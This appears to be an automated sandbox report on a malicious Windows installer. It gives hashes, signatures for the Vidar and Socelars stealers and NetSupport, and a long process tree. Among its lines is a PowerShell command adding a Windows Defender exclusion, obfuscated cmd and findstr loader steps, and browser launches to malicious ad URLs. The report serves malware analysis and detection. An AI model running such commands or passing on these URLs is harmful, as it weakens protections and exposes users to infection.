Analysis

  • max time kernel
    285s
  • max time network
    1210s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    10-09-2021 20:48

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.4MB

  • MD5

    65eed0fdbee8b81c1b9118f86700c6fd

  • SHA1

    fcca1e88a99e2f20403e963b798e3f68f58d638d

  • SHA256

    3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d

  • SHA512

    f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 21 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Known Sinkhole Response Header

    suricata: ET MALWARE Known Sinkhole Response Header

  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

    suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Vidar Stealer 1 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 43 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 29 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 30 IoCs
  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 27 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3584
      • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS00E08283\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3708
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4888
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1212
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Fri192c305b4a.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3016
          • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri192c305b4a.exe
            Fri192c305b4a.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1796
            • C:\Users\Admin\AppData\Local\Temp\tmpDF8D_tmp.exe
              "C:\Users\Admin\AppData\Local\Temp\tmpDF8D_tmp.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              PID:5488
              • C:\Windows\SysWOW64\dllhost.exe
                dllhost.exe
                7⤵
                  PID:5248
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c cmd < Attesa.wmv
                  7⤵
                    PID:5496
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd
                      8⤵
                        PID:5404
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
                          9⤵
                            PID:4884
                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                            Adorarti.exe.com u
                            9⤵
                            • Executes dropped EXE
                            PID:5192
                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                              10⤵
                              • Executes dropped EXE
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:4768
                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                11⤵
                                • Executes dropped EXE
                                • Drops startup file
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:1552
                          • C:\Windows\SysWOW64\PING.EXE
                            ping localhost
                            9⤵
                            • Runs ping.exe
                            PID:5904
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4496
                  • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri192b9eeaa03b.exe
                    Fri192b9eeaa03b.exe
                    5⤵
                    • Executes dropped EXE
                    PID:1452
                    • C:\Users\Admin\AppData\Local\Temp\is-FON3K.tmp\Fri192b9eeaa03b.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-FON3K.tmp\Fri192b9eeaa03b.tmp" /SL5="$301EE,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri192b9eeaa03b.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:5104
                      • C:\Users\Admin\AppData\Local\Temp\is-OSIM8.tmp\46807GHF____.exe
                        "C:\Users\Admin\AppData\Local\Temp\is-OSIM8.tmp\46807GHF____.exe" /S /UID=burnerch2
                        7⤵
                        • Executes dropped EXE
                        PID:5276
                        • C:\Program Files\Windows Defender Advanced Threat Protection\PDTZGYUDMQ\ultramediaburner.exe
                          "C:\Program Files\Windows Defender Advanced Threat Protection\PDTZGYUDMQ\ultramediaburner.exe" /VERYSILENT
                          8⤵
                          • Executes dropped EXE
                          PID:6132
                          • C:\Users\Admin\AppData\Local\Temp\is-D6VCC.tmp\ultramediaburner.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-D6VCC.tmp\ultramediaburner.tmp" /SL5="$60324,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\PDTZGYUDMQ\ultramediaburner.exe" /VERYSILENT
                            9⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            PID:1052
                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                              10⤵
                              • Executes dropped EXE
                              PID:5936
                        • C:\Users\Admin\AppData\Local\Temp\16-c9e1f-2d7-21fa2-32a0d5bd97ab0\Vaeqerufyji.exe
                          "C:\Users\Admin\AppData\Local\Temp\16-c9e1f-2d7-21fa2-32a0d5bd97ab0\Vaeqerufyji.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:1536
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                            9⤵
                              PID:4248
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff860c146f8,0x7ff860c14708,0x7ff860c14718
                                10⤵
                                  PID:5276
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                9⤵
                                  PID:3212
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860c146f8,0x7ff860c14708,0x7ff860c14718
                                    10⤵
                                      PID:5436
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                    9⤵
                                      PID:452
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860c146f8,0x7ff860c14708,0x7ff860c14718
                                        10⤵
                                          PID:2788
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                        9⤵
                                          PID:3008
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860c146f8,0x7ff860c14708,0x7ff860c14718
                                            10⤵
                                              PID:5484
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                            9⤵
                                              PID:2396
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ff860c146f8,0x7ff860c14708,0x7ff860c14718
                                                10⤵
                                                  PID:3964
                                            • C:\Users\Admin\AppData\Local\Temp\48-a21b7-338-35e9f-ed462a330f7c8\Lejirokaedo.exe
                                              "C:\Users\Admin\AppData\Local\Temp\48-a21b7-338-35e9f-ed462a330f7c8\Lejirokaedo.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5780
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bpi15jat.zua\GcleanerEU.exe /eufive & exit
                                                9⤵
                                                  PID:5472
                                                  • C:\Users\Admin\AppData\Local\Temp\bpi15jat.zua\GcleanerEU.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bpi15jat.zua\GcleanerEU.exe /eufive
                                                    10⤵
                                                    • Executes dropped EXE
                                                    PID:5628
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 276
                                                      11⤵
                                                      • Program crash
                                                      • Checks processor information in registry
                                                      • Enumerates system info in registry
                                                      PID:2180
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4wiwv3tj.o0f\installer.exe /qn CAMPAIGN="654" & exit
                                                  9⤵
                                                    PID:3036
                                                    • C:\Users\Admin\AppData\Local\Temp\4wiwv3tj.o0f\installer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\4wiwv3tj.o0f\installer.exe /qn CAMPAIGN="654"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Enumerates connected drives
                                                      • Modifies system certificate store
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:5104
                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4wiwv3tj.o0f\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4wiwv3tj.o0f\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631048163 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                        11⤵
                                                        • Enumerates connected drives
                                                        PID:4892
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uv1owwyw.cqs\anyname.exe & exit
                                                    9⤵
                                                      PID:2800
                                                      • C:\Users\Admin\AppData\Local\Temp\uv1owwyw.cqs\anyname.exe
                                                        C:\Users\Admin\AppData\Local\Temp\uv1owwyw.cqs\anyname.exe
                                                        10⤵
                                                        • Executes dropped EXE
                                                        PID:4780
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3pib2yd4.rou\gcleaner.exe /mixfive & exit
                                                      9⤵
                                                        PID:3192
                                                        • C:\Users\Admin\AppData\Local\Temp\3pib2yd4.rou\gcleaner.exe
                                                          C:\Users\Admin\AppData\Local\Temp\3pib2yd4.rou\gcleaner.exe /mixfive
                                                          10⤵
                                                          • Executes dropped EXE
                                                          PID:4936
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 280
                                                            11⤵
                                                            • Program crash
                                                            PID:5276
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bsjepf0g.bi3\autosubplayer.exe /S & exit
                                                        9⤵
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5788
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4940
                                              • C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri195cd4dbfdf37897.exe
                                                Fri195cd4dbfdf37897.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:1692
                                                • C:\Users\Admin\AppData\Local\Temp\is-OCNTR.tmp\Fri195cd4dbfdf37897.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-OCNTR.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$20174,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS00E08283\Fri195cd4dbfdf37897.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:1916
                                                  • C:\Users\Admin\AppData\Local\Temp\is-EL23K.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-EL23K.tmp\Setup.exe" /Verysilent
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    PID:4028
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs7
                                                      8⤵
                                                      • Adds Run key to start application
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:5268
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860c146f8,0x7ff860c14708,0x7ff860c14718
                                                        9⤵
                                                          PID:5152
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
                                                          9⤵
                                                            PID:5416
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
                                                            9⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5288
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
                                                            9⤵
                                                              PID:888
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                                                              9⤵
                                                                PID:5804
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                                                9⤵
                                                                  PID:5584
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
                                                                  9⤵
                                                                    PID:2536
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
                                                                    9⤵
                                                                      PID:6044
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5540 /prefetch:8
                                                                      9⤵
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:5192
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5540 /prefetch:8
                                                                      9⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3788
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
                                                                      9⤵
                                                                        PID:2436
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                                                        9⤵
                                                                          PID:5220
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
                                                                          9⤵
                                                                          • Checks processor information in registry
                                                                          • Enumerates system info in registry
                                                                          PID:2084
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1040 /prefetch:2
                                                                          9⤵
                                                                            PID:2800
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
                                                                            9⤵
                                                                              PID:6092
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
